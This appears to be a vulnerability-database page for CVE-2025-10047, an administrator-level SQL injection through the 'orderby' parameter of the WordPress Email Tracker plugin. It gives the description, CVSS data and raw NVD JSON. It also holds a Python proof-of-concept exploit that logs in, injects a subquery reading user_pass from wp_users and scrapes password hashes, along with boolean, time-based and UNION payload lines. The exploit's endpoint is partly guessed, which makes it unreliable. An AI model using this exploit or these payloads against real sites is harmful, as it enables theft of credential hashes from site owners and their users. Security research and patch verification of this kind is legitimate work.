Security Vulnerability Report
中文
CVE-2025-10047 CVSS 4.9 MEDIUM

CVE-2025-10047

Published: 2025-10-22 09:15:31
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Email Tracker – Email Log, Email Open Tracking, Email Analytics & Email Management for WordPress Emails plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 5.3.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Email Tracker插件 < 5.3.15
WordPress Email Tracker插件 <= 5.3.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10047 - WordPress Email Tracker Plugin SQL Injection PoC # Vulnerability: SQL Injection via 'orderby' parameter # Affected: Email Tracker plugin <= 5.3.15 # Requirement: Authenticated Administrator access import requests import re # Configuration TARGET_URL = "http://target-wordpress-site.com" ADMIN_USERNAME = "admin" ADMIN_PASSWORD = "password" # Step 1: Login to WordPress as Administrator session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { "log": ADMIN_USERNAME, "pwd": ADMIN_PASSWORD, "wp-submit": "Log In", "redirect_to": f"{TARGET_URL}/wp-admin/", "testcookie": "1" } # Set test cookie session.cookies.set("wordpress_test_cookie", "WP%20Cookie%20check") response = session.post(login_url, data=login_data, allow_redirects=True) if "wp-admin" in response.url: print("[+] Successfully logged in as Administrator") else: print("[-] Login failed") exit(1) # Step 2: Exploit SQL Injection via 'orderby' parameter # The vulnerable endpoint is typically in the admin-ajax.php or plugin-specific page # Crafting UNION-based SQL injection payload # Example payload to extract admin password hash # Using ORDER BY injection technique sqli_payload = "id,(SELECT user_pass FROM wp_users WHERE ID=1)-- -" # Alternative time-based or error-based payloads may also work exploit_url = f"{TARGET_URL}/wp-admin/admin.php" exploit_params = { "page": "email-tracker", # Plugin admin page "orderby": sqli_payload, "order": "DESC" } print(f"[*] Sending SQLi payload via 'orderby' parameter...") response = session.get(exploit_url, params=exploit_params) # Step 3: Extract sensitive information from response if response.status_code == 200: # Look for extracted data in the response # The injected query result may appear in the response body print("[+] Request successful, analyzing response...") # Search for password hash pattern (WordPress uses phpass) hash_pattern = r'\$P\$[A-Za-z0-9./]{31}' matches = re.findall(hash_pattern, response.text) if matches: print(f"[+] Extracted password hashes: {matches}") else: print("[*] No obvious hashes found, check response manually") print(response.text[:500]) else: print(f"[-] Request failed with status code: {response.status_code}") # Note: The exact endpoint and parameters may vary based on plugin version # Additional payload examples: # - Boolean-based: orderby=id AND (SELECT SUBSTRING(user_pass,1,1) FROM wp_users WHERE ID=1)='\$' # - Time-based: orderby=id AND SLEEP(5) # - UNION-based: orderby=-1 UNION SELECT user_pass FROM wp_users-- -

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10047", "sourceIdentifier": "[email protected]", "published": "2025-10-22T09:15:31.473", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Email Tracker – Email Log, Email Open Tracking, Email Analytics & Email Management for WordPress Emails plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 5.3.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3416646%40email-tracker&new=3416646%40email-tracker&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ec4be524-a763-4f2b-8a1d-6189014b4d86?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.